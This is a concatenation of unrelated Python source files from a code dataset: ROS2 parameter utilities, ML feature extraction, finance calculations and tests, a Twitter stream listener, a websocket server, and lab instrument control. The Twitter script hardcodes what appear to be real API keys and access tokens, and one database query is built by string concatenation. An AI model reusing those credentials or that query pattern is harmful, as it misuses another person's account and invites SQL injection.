ParameterType.PARAMETER_INTEGER_ARRAY\n value.integer_array_value = yaml_value\n elif all((isinstance(v, float) for v in yaml_value)):\n value.type = ParameterType.PARAMETER_DOUBLE_ARRAY\n value.double_array_value = yaml_value\n elif all((isinstance(v, str) for v in yaml_value)):\n value.type = ParameterType.PARAMETER_STRING_ARRAY\n value.string_array_value = yaml_value\n else:\n value.type = 
ParameterType.PARAMETER_STRING\n value.string_value = string_value\n else:\n value.type = ParameterType.PARAMETER_STRING\n value.string_value = string_value\n return value\n\n\ndef parse_parameter_dict(*, namespace, parameter_dict):\n parameters = []\n for param_name, param_value in parameter_dict.items():\n full_param_name = namespace + param_name\n # Unroll nested parameters\n if type(param_value) == dict:\n parameters += parse_parameter_dict(\n namespace=full_param_name + PARAMETER_SEPARATOR_STRING,\n parameter_dict=param_value)\n else:\n parameter = Parameter()\n parameter.name = full_param_name\n parameter.value = get_parameter_value(string_value=str(param_value))\n parameters.append(parameter)\n return parameters\n\n\ndef load_parameter_dict(*, node, node_name, parameter_dict):\n\n parameters = parse_parameter_dict(namespace='', parameter_dict=parameter_dict)\n response = call_set_parameters(\n node=node, node_name=node_name, parameters=parameters)\n\n # output response\n assert len(response.results) == len(parameters)\n for i in range(0, len(response.results)):\n result = response.results[i]\n param_name = parameters[i].name\n if result.successful:\n msg = 'Set parameter {} successful'.format(param_name)\n if result.reason:\n msg += ': ' + result.reason\n print(msg)\n else:\n msg = 'Set parameter {} failed'.format(param_name)\n if result.reason:\n msg += ': ' + result.reason\n print(msg, file=sys.stderr)\n\n\ndef load_parameter_file(*, node, node_name, parameter_file, use_wildcard):\n # Remove leading slash and namespaces\n with open(parameter_file, 'r') as f:\n param_file = yaml.safe_load(f)\n param_keys = []\n if use_wildcard and '/**' in param_file:\n param_keys.append('/**')\n if node_name in param_file:\n param_keys.append(node_name)\n\n if param_keys == []:\n raise RuntimeError('Param file does not contain parameters for {}, '\n 'only for nodes: {}'.format(node_name, param_file.keys()))\n param_dict = {}\n for k in param_keys:\n value = param_file[k]\n if type(value) != dict or 'ros__parameters' not in value:\n raise RuntimeError('Invalid structure of parameter file for node {}, '\n 'expected same format as provided by ros2 param dump'\n .format(k))\n param_dict.update(value['ros__parameters'])\n load_parameter_dict(node=node, node_name=node_name, parameter_dict=param_dict)\n\n\ndef call_describe_parameters(*, node, node_name, parameter_names=None):\n # create client\n client = node.create_client(\n DescribeParameters, f'{node_name}/describe_parameters')\n\n # call as soon as ready\n ready = client.wait_for_service(timeout_sec=5.0)\n if not ready:\n raise RuntimeError('Wait for service timed out')\n\n request = DescribeParameters.Request()\n if parameter_names:\n request.names = parameter_names\n future = client.call_async(request)\n rclpy.spin_until_future_complete(node, future)\n\n # handle response\n response = future.result()\n return response\n\n\ndef call_get_parameters(*, node, node_name, parameter_names):\n # create client\n client = node.create_client(GetParameters, f'{node_name}/get_parameters')\n\n # call as soon as ready\n ready = client.wait_for_service(timeout_sec=5.0)\n if not ready:\n raise RuntimeError('Wait for service timed out')\n\n request = GetParameters.Request()\n request.names = parameter_names\n future = client.call_async(request)\n rclpy.spin_until_future_complete(node, future)\n\n # handle response\n response = future.result()\n return response\n\n\ndef call_set_parameters(*, node, node_name, parameters):\n # create client\n client = 
node.create_client(SetParameters, f'{node_name}/set_parameters')\n\n # call as soon as ready\n ready = client.wait_for_service(timeout_sec=5.0)\n if not ready:\n raise RuntimeError('Wait for service timed out')\n\n request = SetParameters.Request()\n request.parameters = parameters\n future = client.call_async(request)\n rclpy.spin_until_future_complete(node, future)\n\n # handle response\n response = future.result()\n return response\n\n\ndef call_list_parameters(*, node, node_name, prefix=None):\n # create client\n client = node.create_client(ListParameters, f'{node_name}/list_parameters')\n\n # call as soon as ready\n ready = client.wait_for_service(timeout_sec=5.0)\n if not ready:\n raise RuntimeError('Wait for service timed out')\n\n request = ListParameters.Request()\n future = client.call_async(request)\n rclpy.spin_until_future_complete(node, future)\n\n # handle response\n response = future.result()\n return response.result.names\n\n\ndef get_parameter_type_string(parameter_type):\n mapping = {\n ParameterType.PARAMETER_BOOL: 'boolean',\n ParameterType.PARAMETER_INTEGER: 'integer',\n ParameterType.PARAMETER_DOUBLE: 'double',\n ParameterType.PARAMETER_STRING: 'string',\n ParameterType.PARAMETER_BYTE_ARRAY: 'byte array',\n ParameterType.PARAMETER_BOOL_ARRAY: 'boolean array',\n ParameterType.PARAMETER_INTEGER_ARRAY: 'integer array',\n ParameterType.PARAMETER_DOUBLE_ARRAY: 'double array',\n ParameterType.PARAMETER_STRING_ARRAY: 'string array',\n ParameterType.PARAMETER_NOT_SET: 'not set',\n }\n return mapping[parameter_type]\n\n\nclass ParameterNameCompleter:\n \"\"\"Callable returning a list of parameter names.\"\"\"\n\n def __call__(self, prefix, parsed_args, **kwargs):\n with DirectNode(parsed_args) as node:\n parameter_names = call_list_parameters(\n node=node, node_name=parsed_args.node_name)\n return [\n n for n in parameter_names\n if not prefix or n.startswith(prefix)]\n","sub_path":"ros2param/ros2param/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"212276426","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport os\n\n\ndef mkdir(path):\n os.mkdir(path)\n\n\ndef mkdirs(paths):\n for path in paths:\n mkdir(path)\n\n\ndef tee(saveto, *args, **kwargs):\n \"\"\"Mimic the tee command, write on both stdout and file\n \"\"\"\n print(*args, **kwargs)\n if saveto is not None:\n print(file=saveto, *args, **kwargs)\n\n\ndef split_files(model_file, system_file, model_dir, system_dir, eos=\".\"):\n def outputs(line, f):\n split_sen = \" .\\n\".join(line.split(\" %s \" % eos))\n print(split_sen, end=\"\", file=f)\n\n with open(model_file) as fmodel:\n for (i, line) in enumerate(fmodel):\n if not line:\n break\n if len(line) == 0:\n continue\n\n with open(\"%s/m.A.%d.txt\" % (model_dir, i), \"w\") as f:\n outputs(line, f)\n\n with open(system_file) as fsystem:\n for (i, line) in enumerate(fsystem):\n if not line:\n break\n if len(line) == 0:\n continue\n\n with open(\"%s/s.%d.txt\" % (system_dir, i), \"w\") as f:\n outputs(line, f)\n","sub_path":"files2rouge/build/lib/files2rouge/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"429109052","text":"import os\nfrom glob import glob\nimport numpy as np\nimport pandas as pd\nimport cv2\nimport torch.nn as nn\nimport torchvision.models as models\nfrom 
torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils\nimport h5py\nimport pickle\n\n# Ignore warinings\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\nimport arg_extractor\n\n\nclass ImageDataset(Dataset):\n '''Images dataset'''\n\n def __init__(self, image_paths, transform=None):\n '''\n :param root_dir: Root directory from which we will open the images\n :param transform: Optional transform to be applied on a image\n '''\n self.transform = transform\n self.image_paths = image_paths\n\n def __len__(self):\n return len(self.image_paths)\n\n def __getitem__(self, idx):\n img_path = self.image_paths[idx]\n img_id = int(img_path.split(\"/\")[-1].split(\".\")[0])\n image = cv2.imread(img_path)\n\n # if not(image is None):\n image = image[:,:,:3]\n # else:\n # image = np.zeros((256, 256, 3),dtype=float)\n\n if self.transform:\n sample = self.transform(image)\n return {'image': sample, 'image_id': img_id}\n\n\nclass Rescale(object):\n \"\"\"Rescale the image in a sample to a given size.\"\"\"\n\n def __init__(self, output_size):\n assert isinstance(output_size, (int, tuple))\n self.output_size = output_size\n\n def __call__(self, sample):\n image = sample\n\n h, w = image.shape[:2]\n if isinstance(self.output_size, int):\n if h > w:\n new_h, new_w = self.output_size * h / w, self.output_size\n else:\n new_h, new_w = self.output_size, self.output_size * w / h\n else:\n new_h, new_w = self.output_size\n\n new_h, new_w = int(new_h), int(new_w)\n\n img = cv2.resize(image, (new_h, new_w))\n return img\n\n\nclass RandomCrop(object):\n \"\"\"Crop randomly the image in a sample.\"\"\"\n\n def __init__(self, output_size):\n \"\"\"\n :param output_size: Desired output size. If int, square crop is made.\n \"\"\"\n assert isinstance(output_size, (int, tuple))\n if isinstance(output_size, int):\n self.output_size = (output_size, output_size)\n else:\n assert len(output_size) == 2\n self.output_size = output_size\n\n def __call__(self, sample):\n image = sample\n\n h, w = image.shape[:2]\n new_h, new_w = self.output_size\n\n top = np.random.randint(0, h - new_h)\n left = np.random.randint(0, w - new_w)\n\n image = image[top: top + new_h,\n left: left + new_w]\n\n return image\n\nargs, device = arg_extractor.get_args()\nprint(args)\n\ndict = pickle.load(open('dataset/Image_embed_dict.pickle', 'rb'))\n\ncomposed = transforms.Compose([Rescale(256),\n RandomCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n\ngeneral_path = \"/home/s1885778/nrl/dataset/Images_/Images_\"\n\nresnet152 = models.resnet152(pretrained=True)\nresnet152_extract = nn.Sequential(*list(resnet152.children())[:-1])\nresnet152 = resnet152_extract\nresnet152.to(device)\n\narr = list(dict.keys())[args.seed*5 : (args.seed+1)*5]\n\nfor item in arr:\n image_paths = []\n image_ids = dict[item]\n for id in image_ids:\n temp = general_path + str(item) + \"/\" + str(id)\n image_paths.append(temp)\n\n\n image_dataset = ImageDataset(image_paths=image_paths, transform=composed)\n print(len(image_dataset))\n dataload = DataLoader(image_dataset, batch_size=args.batch_size, num_workers=0)\n\n\n features = []\n ids = []\n for i_batch, sample_batched in enumerate(dataload):\n # Get image features\n print(\"Put images on device: \" + str(device))\n input = sample_batched['image'].to(device)\n print(\"Put them through the pretrained network...\")\n batch_features = resnet152.forward(input)\n # Reshape output from the last layer of the resnet\n 
print(\"Return data on CPU\")\n batch_features = batch_features.cpu()\n print(batch_features.shape)\n batch_features = batch_features.reshape(batch_features.shape[0], batch_features.shape[1])\n # Use detach to imply that I don't need gradients\n # Turn tensor into numpy array\n # Save each image feature with its corresponing img_id\n print(\"Add batch to list...\")\n batch_features = batch_features.detach().numpy().astype(float)\n for i, id in enumerate(sample_batched['image_id']):\n ids.append(int(id))\n features.append(batch_features[i, :])\n\n # Saving the data\n save_file_path = \"/home/s1885778/nrl/dataset/resnet152_1/image_features_\" + str(item) + \".hdf5\"\n print(\"Saving file: \" + save_file_path + \" ...\")\n data_file = h5py.File(save_file_path, 'w')\n data_file.create_dataset(\"image_id\", data=ids)\n data_file.create_dataset(\"image_features\", data=features)\n","sub_path":"image_feature_extraction.py","file_name":"image_feature_extraction.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"508140933","text":"import numpy as np\nimport pymysql\nimport logisticV3\n\n\ndef readDataFromDatabase(code=\"sh513050\"):\n conn = pymysql.connect(host='127.0.0.1', user='root', password='root', database='stock_project', charset='utf8')\n cursor = conn.cursor()\n sql = \"select * from stock_transaction_info where code = '\" + code + \"';\"\n cursor.execute(sql)\n result = cursor.fetchall()\n # value = ret['name']\n cursor.close()\n conn.close()\n return result\n\n\nP = 14\n\n\ndef calculateCCI(data, P):\n OPEN = 0\n HIGH = 1\n LOW = 2\n CLOSE = 3\n # data = getData()\n typePrice = (data[:, LOW] + data[:, CLOSE] + data[:, HIGH]) / 3.0\n len_typePrice = len(typePrice)\n MAArr = []\n MDArr = []\n for i in range(P - 1):\n MAArr.append(0.0)\n for i in range(P - 1, len_typePrice):\n sum_of_type_price = sum(typePrice[i - P + 1: i + 1] / P)\n MAArr.append(np.round(sum_of_type_price, 2))\n for i in range(P - 1):\n MDArr.append(0.001)\n for i in range(P - 1, len_typePrice):\n np_abs = np.abs(np.array(typePrice[i - P + 1:i + 1] - MAArr[i]))\n np_res = np.round(np_abs, 2)\n MDValue = np.sum(np_res) / P\n MDArr.append(MDValue)\n CCI = (typePrice - MAArr) / (np.array(MDArr) * 0.015)\n return CCI\n\n\ndef anliaze(closeValue, cciList, code):\n len_cciList = len(cciList)\n tdtime = []\n for i in range(len_cciList):\n tdtime.append(0)\n print(cciList)\n\n time = 0\n for i in range(P + 1, len_cciList):\n if cciList[i] > -20:\n tdtime[i] = 0\n elif cciList[i - 1] < -100 < cciList[i]:\n tdtime[i] = tdtime[i - 1] + 1\n else:\n tdtime[i] = tdtime[i - 1]\n pass\n\n count = 0\n successCount = 0\n for i in range(P + 1, len_cciList - 1):\n if cciList[i - 1] < -100 < cciList[i] and closeValue[i - 1] > closeValue[i] and tdtime[i] >= 3:\n count += 1\n isSuccess = 0\n for j in range(1, 6):\n if dateList[i] == 20180704:\n a = 1 + 1\n if closeValue[i + j] > closeValue[i]:\n isSuccess = 1\n successCount += isSuccess\n if isSuccess == 0:\n print(code, tdtime[i], dateList[i])\n\n print(count)\n print(successCount)\n\n\nif __name__ == '__main__':\n code = \"sz200028\"\n data = readDataFromDatabase(code)\n dateList = [i[8] for i in data]\n openValue = [i[2] for i in data]\n closeValue = [i[3] for i in data]\n highValue = [i[4] for i in data]\n lowValue = [i[5] for i in data]\n d = [openValue, closeValue, highValue, lowValue]\n data = np.transpose(np.array(d))\n cciList = calculateCCI(data, 14)\n anliaze(closeValue, cciList, 
code)\n","sub_path":"CCIOb.py","file_name":"CCIOb.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"329770198","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\ndescription\r\n\"\"\"\r\n\r\n__author__ = \"Kelzenberg.Ralf\"\r\n__copyright__ = \"Copyright 2012, Kelzenberg.Ralf\"\r\n__credits__ = [\"Kelzenberg.Ralf\"]\r\n__license__ = \"GPL\"\r\n__version__ = \"$Rev$\"\r\n__maintainer__ = \"Kelzenberg.Ralf\"\r\n__email__ = \"mail@ralfkelzenberg.de\"\r\n__status__ = \"Alpha\"\r\n\r\nfrom Graphics.diagram_layout_maker import Diagramm_Layout_Maker as diagram_layout\r\nfrom Database.oracle import Oracle\r\n\r\nif __name__ == '__main__':\r\n dialay = diagram_layout()\r\n\r\n sql = (\"select we_mal_stoezeit_kaa/we_mal_stoezeit_kad, (we_mal_stoezeit_kaa+we_mal_stoezeit_kad)/2 from \"\r\n \"auftreinh where we_mal_stoezeit_kad > 0 and we_mal_stoezeit_kaa is not NULL\")\r\n res = Oracle().executeSQL(sql) # fetch the data (only the y values here)\r\n x = [i[0] for i in res]\r\n w = [i[1] for i in res]\r\n dialay.add_histplot(x=x,\r\n weightslist=w, bins=100)\r\n dialay.show()\r\n","sub_path":"naos-python/Library/Examples/histgraph.py","file_name":"histgraph.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"307580644","text":"import unittest\n\nfrom fixed_income import bonds\n\n\nclass TestFunctions(unittest.TestCase):\n def test_ytm_equals_coupon_rate(self):\n face_value = 100\n coupon = 6.5\n expected = coupon / face_value\n actual = bonds.yield_to_maturity(bond_price=face_value, face_value=face_value, periods=8, coupon=coupon)\n self.assertAlmostEqual(actual, expected)\n\n def test_price_equals_cash_flows_when_ytm_is_zero(self):\n face_value = 100\n coupon = 6.5\n periods = 8\n expected = coupon * periods + face_value\n actual = bonds.price(ytm=0, face_value=face_value, periods=periods, coupon=coupon)\n self.assertAlmostEqual(actual, expected)\n\n\nclass TestClasses(unittest.TestCase):\n def test_non_int_periods_causes_assertion_error(self):\n with self.assertRaises(AssertionError):\n bonds.Bond(face_value=100, coupon=5, periods=2.5, ytm=0.03)\n\n def test_price_equals_par_when_coupon_equals_ytm(self):\n face_value = 100\n ytm = 0.07\n coupon = ytm * face_value\n bond = bonds.Bond(face_value=face_value, coupon=coupon, ytm=ytm, periods=12)\n self.assertAlmostEqual(bond.price, face_value)\n\n def test_duration_of_zero_equals_periods(self):\n expected = 7\n zcb = bonds.ZeroCoupon(face_value=100, periods=expected, ytm=0.05)\n self.assertAlmostEqual(zcb.duration, expected)\n\n def test_from_price(self):\n face_value = 100\n coupon = 6.5\n periods = 8\n ytm = coupon / face_value\n actual = bonds.Bond.from_price(bond_price=face_value, face_value=face_value, periods=periods, coupon=coupon)\n expected = bonds.Bond(ytm=ytm, face_value=face_value, periods=periods, coupon=coupon)\n self.assertEqual(actual, expected)\n\n def test_cash_flow_iteration(self):\n face_value = 100\n coupon = 7\n periods = 2\n bond = bonds.Bond(ytm=0.01, face_value=face_value, periods=periods, coupon=coupon)\n actual = list(bond)\n expected = [(1, coupon), (2, coupon + face_value)]\n self.assertEqual(actual, expected)\n\n def test_coupon_bond_duration(self):\n \"\"\"Based on question 23a chapter 16 of Bodie Kane Marcus - Investments (10th Ed)\"\"\"\n bond = bonds.Bond(ytm=0.07, face_value=100, periods=10, coupon=7)\n expected = 
7.51523225\n self.assertAlmostEqual(bond.duration, expected)\n\n def test_coupon_bond_convexity(self):\n \"\"\"Based on question 23b chapter 16 of Bodie Kane Marcus - Investments (10th Ed)\"\"\"\n bond = bonds.Bond(ytm=0.07, face_value=100, periods=10, coupon=7)\n expected = 64.9329593\n self.assertAlmostEqual(bond.convexity, expected)\n\n def test_perpetuity_duration(self):\n ytm = 0.07\n perpetuity = bonds.Perpetuity(ytm=ytm, coupon=1)\n expected = (1 + ytm) / ytm\n self.assertAlmostEqual(perpetuity.duration, expected)\n\n def test_perpetuity_convexity(self):\n ytm = 0.07\n perpetuity = bonds.Perpetuity(ytm=ytm, coupon=1)\n expected = 2 / ytm ** 2\n self.assertAlmostEqual(perpetuity.convexity, expected)\n\n def test_coupon_bond_price_change_without_convexity(self):\n \"\"\"Based on question 23c chapter 16 of Bodie Kane Marcus - Investments (10th Ed)\"\"\"\n bond = bonds.Bond(ytm=0.07, face_value=100, periods=10, coupon=7)\n actual = bond.price_change(ytm_change=0.01)\n expected = -7.02358154\n self.assertAlmostEqual(actual, expected)\n\n def test_coupon_bond_price_change_with_convexity(self):\n \"\"\"Based on question 23d chapter 16 of Bodie Kane Marcus - Investments (10th Ed)\"\"\"\n bond = bonds.Bond(ytm=0.07, face_value=100, periods=10, coupon=7)\n actual = bond.price_change(ytm_change=0.01, use_convexity=True)\n expected = -6.69891674\n self.assertAlmostEqual(actual, expected)","sub_path":"test/test_bonds.py","file_name":"test_bonds.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"642464129","text":"from setuptools import find_packages\nfrom setuptools import setup\n\ninstall_requires = [\n \"flask\",\n \"flask_mongoengine\",\n \"bcrypt\",\n \"flask_pymongo\",\n \"pytz\",\n \"gunicorn\",\n \"sentry-sdk[flask]==0.10.1\",\n \"flask_classy\",\n \"requests\"\n]\n\nsetup(\n name=\"fitr_webapp\",\n version=\"1.0.4\",\n url=\"https://fitr.gq\",\n license=\"None\",\n maintainer=\"CDF\",\n maintainer_email=\"howzitcallum@gmail.com\",\n description=\"Fitness App\",\n long_description=\"Fitness App\",\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n install_requires=install_requires,\n extras_require={\"test\": [\"pytest\", \"coverage\"]},\n scripts=['./fitr_webapp/scripts/init_db',\n './fitr_webapp/scripts/start_dev']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"520220321","text":"import sqlite3\n\ncon = sqlite3.connect(\"C:\\\\Users\\\\harshit.kacker\\\\harshit.db\")\ncr=con.cursor()\n#cr.execute(\"SELECT * from emp\")\n#cr.execute(\"INSERT into emp values (?,?)\",(int(input(\"Enter,id\")), input(\"Enter,name\")))\n#print(\"value added\")\n#cr.execute(\"UPDATE emp set name=? 
where id=?\",(input(\"Enter new name\"),int(input(\"Enter id to change\"))))\n#print(\"value updated\")\ncr.execute(\"DELETE from emp where id=?\",(int(input(\"enter the id\")),))\nprint(\"value deleted\")\ncon.commit();\n\n\"\"\"print(cr.fetchall())\nprint(cr.fetchone())\nprint(cr.fetchone())\nprint(cr.fetchone())\"\"\"\n\n\"\"\"mylist = cr.fetchmany(3)\nfor val in mylist :\n for data in val :\n print(data) \n \nfor val in mylist :\n print(val[0],\" \",val[1]) \"\"\"","sub_path":"Basics/sql_connector.py","file_name":"sql_connector.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"15814789","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 11 12:38:28 2016\n\n@author: luca\n\"\"\"\n\nimport time\nimport sys\nimport numpy as np\n\nsys.path.append('..')\nimport aptlib\nsys.path.append('/home/sagnac/Quantum/ttag/python/')\nimport ttag\n\n# buffer number\nbufNum = 0\n\nIntegrationTime = 5.\nCoincidenceRadius = 1e-9\n\n# Channel delays\nDelays = [0, 0.3, -9.8, -9.1]\n\n# Serial Numbers of APT controllers\nSNAliceHWP = 83830445\nSNAliceQWP = 83865112\nSNBobHWP = 83825706\nSNBobQWP = 83865359\n\n# Set off angles of rotators\nzeroAngle = {'AliceHWP': 30.5,\n 'AliceQWP': 2,\n 'BobHWP': 131,\n 'BobQWP': 23.5\n }\n \n# Measurement configurations: wave plates positions\n# Structure of the dictionary: 'BasisName':[HWPangle, QWPangle] angles are in degrees\n#MeasurementsConf = {'HV': [0.,0.], 'VH': [45.,0.], 'DA': [22.5, 45.], 'AD': [67.5, 45.], 'RL': [22.5, 0.], 'LR': [67.5, 0.]}\nMeasurementsConf = {'HV': [0.,0.], 'DA': [22.5, 45.], 'RL': [22.5, 0.]}\n\n#OrderOfMeasuredBases = ['HV', 'VH', 'DA', 'AD', 'RL', 'LR']\nOrderOfMeasuredBases = ['HV', 'DA', 'RL']\n\n# Homing the plates\ndef HomingWP():\n conAliceHWP.home()\n conAliceQWP.home()\n conBobHWP.home()\n conBobQWP.home()\n\n# Move all rotators to their set off angle \ndef MoveToZeroAngle():\n conAliceHWP.goto(float(zeroAngle['AliceHWP']))\n conAliceQWP.goto(float(zeroAngle['AliceQWP']))\n conBobHWP.goto(float(zeroAngle['BobHWP']))\n conBobQWP.goto(float(zeroAngle['BobQWP']))\n \ndef RotateWP(con, angle, name):\n con.goto(float(zeroAngle[name] + angle))\n\n##############\n# Main code\n##############\n\n# Open buffer for data acquisition\nttagBuf = ttag.TTBuffer(bufNum)\n\n# set channel delays\ndelays = np.zeros(ttagBuf.channels,dtype=np.double)\ndelays[0] = Delays[0]*1e-9\ndelays[1] = Delays[1]*1e-9 \ndelays[2] = Delays[2]*1e-9 \ndelays[3] = Delays[3]*1e-9 \n\n# Connect APT controllers\nconAliceHWP = aptlib.PRM1(serial_number=SNAliceHWP)\nconAliceQWP = aptlib.PRM1(serial_number=SNAliceQWP)\nconBobHWP = aptlib.PRM1(serial_number=SNBobHWP)\nconBobQWP = aptlib.PRM1(serial_number=SNBobQWP)\n\n# Homing plates\nHomingWP()\nprint('Homing DONE')\n\n# Set plates to zero angle\nMoveToZeroAngle()\nprint('Plates to Zero')\n\n# Initialize dictionary to save coincidences\n#Measurements = {'HVHV': 0,\n# 'HVDA': 0,\n# 'HVRL': 0,\n# 'DAHV': 0,\n# 'DADA': 0,\n# 'DARL': 0,\n# 'RLHV': 0,\n# 'RLDA': 0,\n# 'RLRL': 0}\nMeasurements={}\nfor Alice in OrderOfMeasuredBases:\n # Move Alice's plates\n RotateWP(conAliceHWP, MeasurementsConf[Alice][0], 'AliceHWP')\n RotateWP(conAliceQWP, MeasurementsConf[Alice][1], 'AliceQWP')\n \n for Bob in OrderOfMeasuredBases:\n # Move Bob's plates\n RotateWP(conBobHWP, MeasurementsConf[Bob][0], 'BobHWP')\n RotateWP(conBobQWP, MeasurementsConf[Bob][1], 'BobQWP')\n print('Bases: Alice', Alice, ' Bob', Bob)\n # Wait integration time + half 
a second\n time.sleep( IntegrationTime + 1.0 )\n \n #Aquire data, saving coincidences\n cMatrix = ttagBuf.coincidences(IntegrationTime, CoincidenceRadius, -delays)[0:4,0:4]\n \n #RotateWP(conAliceHWP, MeasurementsConf[Alice][0] + 45., 'AliceHWP')\n #RotateWP(conBobHWP, MeasurementsConf[Bob][0] + 45., 'BobHWP')\n \n #c2 = ttagBuf.coincidences(IntegrationTime, CoincidenceRadius, -delays)[0:4,0:4]\n #cMatrix = [c1, c2]\n print(cMatrix)\n #print(cMatrix[0])\n Measurements[Alice+Bob] = cMatrix\n \n# Save measurements\nnp.save('Tomography.npy',Measurements)\nprint('Measurements saved')\n\nRotateWP(conAliceHWP, 0., 'AliceHWP')\nRotateWP(conAliceQWP, 0., 'AliceQWP')\nRotateWP(conBobHWP, 0., 'BobHWP')\nRotateWP(conBobQWP, 0., 'BobQWP')\n","sub_path":"TwoQubitsTomographyMeasurements.py","file_name":"TwoQubitsTomographyMeasurements.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"602772861","text":"from tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom tweepy.streaming import StreamListener\nimport time\n\nckey = 'B6tZdUyY6vHnMWYW79J9sUZzS'\ncsecret = 'F6n10hAo2n8VQFSNQEXliLCNRxjtJwshInF6A95RbZoUViaYOA'\natoken = '787526326018117632-KlRhZDNMxddJQJsHvpDZYMmz5cUaJiX'\nasecret = 'VBspTZpYNjQ7A1nxrZWB8Mp6rJCzBlUB7rPFismnmDzNK'\n\nclass listener(StreamListener):\n def on_data(self, data):\n try:\n print(data)\n saveFile = open(\"f:\\\\tweets.csv\",\"a\")\n saveFile.write(data)\n saveFile.write('\\n')\n saveFile.close()\n return(True)\n except BaseException as e:\n print('failed ondata,',str(e))\n time.sleep(5)\n\ndef on_error(self, status):\n print(status)\n\nauth = OAuthHandler(ckey, csecret)\nauth.set_access_token(atoken, asecret)\n\ntwitterStream = Stream(auth, listener())\ntwitterStream.filter(track=['Construction Worker','Helmet'])","sub_path":"twitterhdata.py","file_name":"twitterhdata.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"19122180","text":"import asyncio\nimport websockets\nimport numpy as np\nimport cv2\nimport mss\nimport mss.tools\n\nconnected = set()\nseen_worker_ids = []\ndata = [0,0]\nasync def server(websocket, path):\n lastName = None\n while True:\n async for message in websocket:\n if message not in seen_worker_ids or message == \"\":\n seen_worker_ids.append(message)\n\n sample_number = data[0]\n observationType = data[1]\n\n print (\"sending \" + str(sample_number) + \",\" + str(observationType))\n\n await websocket.send(str(sample_number) + \",\" + str(observationType))\n sample_number = int(sample_number)\n observationType = int(observationType)\n\n if observationType < 3:\n observationType +=1\n else:\n observationType = 0\n sample_number+=1\n if sample_number >= 30:\n sample_number = 0\n data[0] = str(sample_number)\n data[1] = str(observationType)\n\nstart_server = websockets.serve(server, \"localhost\", 3000)\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()\n","sub_path":"workerHandlerSocket.py","file_name":"workerHandlerSocket.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"268995757","text":"import logging\n\nfrom astropy import modeling\nfrom astropy import units as u, constants as const\nimport pandas as pd\nimport h5py\nfrom scipy import interpolate\nimport numpy as np\n\n#from starkit.base.parameter import 
StarKitParameter as Parameter\nfrom astropy.modeling import Parameter\nfrom starkit.fitkit.priors import UniformPrior\n\nlogger = logging.getLogger(__name__)\n\nclass BaseSpectralGrid(modeling.Model):\n inputs = tuple()\n outputs = ('wavelength', 'flux')\n\n def __init__(self, wavelength, index, fluxes, **kwargs):\n self.R = kwargs.pop('R', None)\n self.R_sampling = kwargs.pop('R_sampling', None)\n self.flux_unit = kwargs.pop('flux_unit', None)\n self.index = index\n self.fluxes = fluxes\n\n super(BaseSpectralGrid, self).__init__(**kwargs)\n self.interpolator = self._generate_interpolator(index, fluxes)\n self.wavelength = wavelength\n\n def get_grid_extent(self):\n extents = []\n for i, param_name in enumerate(self.param_names):\n extents.append((self.interpolator.points[:, i].min(),\n self.interpolator.points[:, i].max()))\n return extents\n\n def get_grid_uniform_priors(self):\n extents = self.get_grid_extent()\n priors = []\n for extent in extents:\n priors.append(UniformPrior(*extent))\n\n return priors\n\n def evaluate(self, *args):\n\n return self.wavelength, self.interpolator(np.array(\n args).reshape(len(self.param_names)))[0]\n\n @staticmethod\n def _generate_interpolator(index, fluxes):\n return interpolate.LinearNDInterpolator(index, fluxes)\n\n @property\n def velocity_per_pix(self):\n if self.R is None:\n raise ValueError('R and R_sampling for the current grid not known')\n\n else:\n return const.c / self.R / self.R_sampling\n\n def _renormalize_grid(self):\n for i in xrange(self.fluxes.shape[0]):\n self.fluxes[i] /= np.trapz(self.fluxes[i], self.wavelength)\n\n\ndef load_grid(hdf_fname):\n \"\"\"\n Load the grid from an HDF file\n\n Parameters\n ----------\n hdf_fname: ~str\n filename and path to the HDF file\n\n Returns\n -------\n : SpectralGrid object\n\n \"\"\"\n logger.info('Reading index')\n index = pd.read_hdf(hdf_fname, 'index')\n meta = pd.read_hdf(hdf_fname, 'meta')\n logger.info('Discovered columns {0}'.format(', '.join(meta['parameters'])))\n interpolate_parameters = meta['parameters']\n\n with h5py.File(hdf_fname) as fh:\n logger.info('Reading Fluxes')\n fluxes = fh['fluxes'].__array__()\n logger.info('Fluxes shape {0}'.format(fluxes.shape))\n flux_unit = u.Unit(meta['flux_unit'])\n wavelength = 